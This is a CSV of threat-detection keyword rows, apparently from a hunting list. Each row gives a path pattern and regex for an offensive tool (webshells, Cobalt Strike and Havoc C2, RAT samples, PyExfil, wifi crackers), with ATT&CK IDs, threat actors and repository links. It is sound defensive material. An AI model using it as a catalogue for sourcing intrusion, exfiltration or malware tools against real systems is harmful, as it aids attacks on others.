"*/WeblogicRCE.exe*",".{0,1000}\/WeblogicRCE\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12537"
"*/weblogic-t3-info.nse*",".{0,1000}\/weblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12538"
"*/webpassview.exe*",".{0,1000}\/webpassview\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12539"
"*/webshell.py*",".{0,1000}\/webshell\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","12540"
"*/webshell/*.aspx*",".{0,1000}\/webshell\/.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","12541"
"*/webshell/*.jsp*",".{0,1000}\/webshell\/.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","12542"
"*/webshell/*.php*",".{0,1000}\/webshell\/.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","12543"
"*/Webshell_Generate-1.1.jar*",".{0,1000}\/Webshell_Generate\-1\.1\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12544"
"*/webshell-123.php*",".{0,1000}\/webshell\-123\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12545"
"*/webshell-cnseay02-1.php*",".{0,1000}\/webshell\-cnseay02\-1\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12546"
"*/webshell-cnseay-x.php*",".{0,1000}\/webshell\-cnseay\-x\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12547"
"*/WebShellKillerTool.zip*",".{0,1000}\/WebShellKillerTool\.zip.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12548"
"*/webshells/shell.aspx*",".{0,1000}\/webshells\/shell\.aspx.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","12549"
"*/webshells/shell.php*",".{0,1000}\/webshells\/shell\.php.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","12550"
"*/WebSocketC2.cs*",".{0,1000}\/WebSocketC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","12551"
"*/webtrufflehog.git*",".{0,1000}\/webtrufflehog\.git.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","1","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","12552"
"*/webtrufflehog.log*",".{0,1000}\/webtrufflehog\.log.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","12553"
"*/weevely.py*",".{0,1000}\/weevely\.py.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","1","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","12557"
"*/well_known_sids.py*",".{0,1000}\/well_known_sids\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","12558"
"*/WerTrigger.git*",".{0,1000}\/WerTrigger\.git.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","N/A","9","3","221","36","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z","12559"
"*/WfpTokenDup.exe*",".{0,1000}\/WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12560"
"*/wfuzz *",".{0,1000}\/wfuzz\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","12561"
"*/whatlicense.git*",".{0,1000}\/whatlicense\.git.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","12562"
"*/WheresMyImplant/*",".{0,1000}\/WheresMyImplant\/.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","12563"
"*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12564"
"*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12565"
"*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12566"
"*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12567"
"*/whoami.py*",".{0,1000}\/whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12568"
"*/WhoAmI.task*",".{0,1000}\/WhoAmI\.task.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","12569"
"*/whois-domain.nse*",".{0,1000}\/whois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12570"
"*/whois-ip.nse*",".{0,1000}\/whois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12571"
"*/Widgets/LootWidget.*",".{0,1000}\/Widgets\/LootWidget\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","12572"
"*/wifi_hopping.*",".{0,1000}\/wifi_hopping\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","12573"
"*/WiFiBroot*",".{0,1000}\/WiFiBroot.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","12574"
"*/wifidump.c*",".{0,1000}\/wifidump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","12575"
"*/WifiKeys.dll*",".{0,1000}\/WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12576"
"*/wifiPayload/client.py*",".{0,1000}\/wifiPayload\/client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","12577"
"*/wifiPayload/server.py*",".{0,1000}\/wifiPayload\/server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","12578"
"*/wifite -c *",".{0,1000}\/wifite\s\-c\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","12579"
"*/wifite2*",".{0,1000}\/wifite2.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","1","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","12580"
"*/wikipedia_fr.7z*",".{0,1000}\/wikipedia_fr\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12581"
"*/wikiZ/RedGuard*",".{0,1000}\/wikiZ\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","12582"
"*/win/Tor/tor.exe*",".{0,1000}\/win\/Tor\/tor\.exe.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","12583"
